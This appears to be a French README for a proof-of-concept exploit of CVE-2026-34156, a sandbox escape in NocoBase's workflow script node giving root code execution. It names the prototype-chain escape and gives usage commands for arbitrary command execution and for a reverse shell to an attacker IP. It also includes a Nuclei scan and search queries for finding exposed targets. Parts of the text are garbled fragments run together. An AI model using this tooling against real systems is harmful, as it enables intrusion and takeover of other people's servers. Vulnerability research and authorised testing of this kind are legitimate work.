
CVE-2026-34156
Exécution de code à distance non authentifiée / à faibles privilèges → root dans NocoBase
CVE-2026-34156 est une vulnérabilité critique d'évasion de sandbox dans NocoBase (une plateforme open-source no-code/low-code).
Un attaquant capable de créer ou d'exécuter un nœud de script de workflow (même avec de faibles privilèges) peut s'échapper de la sandbox vm de Node.js et obtenir une exécution de code à distance complète en tant que root dans le conteneur.
@nocobase/plugin-workflow-javascript (nœud de script)console._stdout.constructor.constructoruid=0)fs)L'objet console passé dans la sandbox provient du domaine hôte, ce qui permet aux attaquants de remonter la chaîne de prototypes et d'accéder au vrai constructeur Function → process.mainModule.require.
# Simple command execution
python3 CVE-2026-34156.py -u https://target.com -e [email protected] -p password -c "id"
# Reverse shell
python3 CVE-2026-34156.py -u https://target.com -r 192.168.1.100:4444
Le dépôt comprend : le script PoC complet, un modèle Nuclei et un vérificateur sans danger.
nuclei -u https://target -t cves/CVE-2026-34156.yaml
title="NocoBase" || title="Sign in - NocoBase"
title="NocoBase" && body="workflow"
isolated-vm) en production.
Ce dépôt est destiné uniquement à des fins éducatives et de recherche en sécurité autorisée.
Utilisez-le uniquement sur des systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation écrite explicite de test.
Toute exploitation non autorisée est illégale.
Fait avec ❤️ pour la communauté de la sécurité
Restez en sécurité. Patchez vite.